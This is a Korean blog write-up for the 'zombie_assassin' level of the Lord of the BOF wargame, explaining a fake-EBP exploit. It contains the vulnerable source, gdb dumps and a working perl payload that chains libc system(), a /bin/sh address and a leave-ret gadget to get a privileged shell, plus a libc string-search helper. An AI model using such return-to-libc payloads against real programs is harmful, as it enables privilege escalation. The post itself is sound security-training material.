오마이갓 fake ebp.. you are like twins with fpo omg why
참고한 자료들:
http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱
http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!
이런분들 사이에 끼어 살다니 영광이빈다..
&&... cd80 ㅎ ㄳㄳㄳ
검색기록 날리고 고정된 탭들역시 다 날아가서.. 후.. 더 올릴 수는 없지만 크롬 제발 최근 탭 이거 좀 늘려줬으면 좋겠네요..
[assassin@localhost assassin]$ ls
zombie_assassin zombie_assassin.c
[assassin@localhost assassin]$ cat zombie_assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
// strncpy instead of strcpy!
strncpy(buffer, argv[1], 48);
printf("%s\n", buffer);
}
[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "\x90"x48'`
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) x/40wx $esp-40
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090 //훼이크(?)
0xbffffad8: 0x90909090 0x90909090 0x00000002 0xbffffb24
0xbffffae8: 0xbffffb30 0x40013868 0x00000002 0x08048390
0xbffffaf8: 0x00000000 0x080483b1 0x08048440 0x00000002
0xbffffb08: 0xbffffb24 0x080482e4 0x0804851c 0x4000ae60
0xbffffb18: 0xbffffb1c 0x40013e90 0x00000002 0xbffffc16
0xbffffb28: 0xbffffc28 0x00000000 0xbffffc59 0xbffffc6c
0xbffffb38: 0xbffffc84 0xbffffca3 0xbffffcc5 0xbffffcd3
0xbffffb48: 0xbffffe96 0xbffffeb5 0xbffffed3 0xbffffee8
(gdb) x/40wx $esp-80
0xbffffa90: 0x40106980 0x0804857e 0xbffffab0 0x401081ec
0xbffffaa0: 0xbffffad8 0x080484dc 0x0804857e 0xbffffab0
0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x00000002 0xbffffb24 0xbffffb30 0x40013868
0xbffffaf0: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffb00: 0x08048440 0x00000002 0xbffffb24 0x080482e4
0xbffffb10: 0x0804851c 0x4000ae60 0xbffffb1c 0x40013e90
0xbffffb20: 0x00000002 0xbffffc16 0xbffffc28 0x00000000
(gdb) q
[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]
bash2: buffer[system: command not found
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
[assassin@localhost assassin]$ clear
[assassin@localhost assassin]$ gdb -q newbie_assassin core
Core was generated by `./newbie_assassin '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048446
(gdb) r
Starting program: /home/assassin/newbie_assassin
Breakpoint 1, 0x8048446 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
---Type <return> to continue, or q <return> to quit---
0x80484b7 <main+119>: push $0x30
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
End of assembler dump.
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$ my-pass
euid = 516
근데 이상한거 하나 잘못하다가 bash2 무작정 많이 돌려놨거든여 그래서 ps하면 bash2가 3개정도 돌아가고있어쓴ㄴ데 그러면 공격이 안되더라고여 (다른 세션으로 했는데 공격되는데 막 내가쓰는건 안댐)그래서 다 bash까지 exit하고서 다시 bash2하니까 되네요 왜그럼
그리고 예전에 libc에서 /bin/sh문자열 찾는 소스 구해서 여따가 썼는데.. 사이트 아마 저장해뒀을테니까 찾아볼께요 이번에 다시 완전히 처음부터 해보려고 소스던 로그던 다날려서 못찾음..ㄸㄹㄹ
그나저나 하.. 어렵다! 두단계남았다! 배고프다! 2시다!!! 으랴
+)로그 안날아갔다고 합니다 똑똑한 토끼를 칭찬해주세여 하지만 또 올릴 필요는 없으니 /bin/sh찾는 소스만 올리겠습니다
-해당 소스-
[assassin@localhost assassin]$ cat foo.c
main(){
char *p;
p = 0x4002c000;
while (1) {
while (*p++ != '/') ;
if (strcmp(p-1, "/bin/sh") == 0) {
printf("0x%08x\n", p-1);
return 0;
}
}
}
출처는 <http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>여기서 찾았습니다.
'STUDY > Lord of the BOF' 카테고리의 다른 글
| succubus->nightmare (0) | 2014.07.10 |
|---|---|
| zombie_assassin->succubus (0) | 2014.07.08 |
| assassin->zombie_assassin (0) | 2014.05.13 |
| giant->assassin (0) | 2014.04.22 |
| bugbear->giant(1) (0) | 2014.04.16 |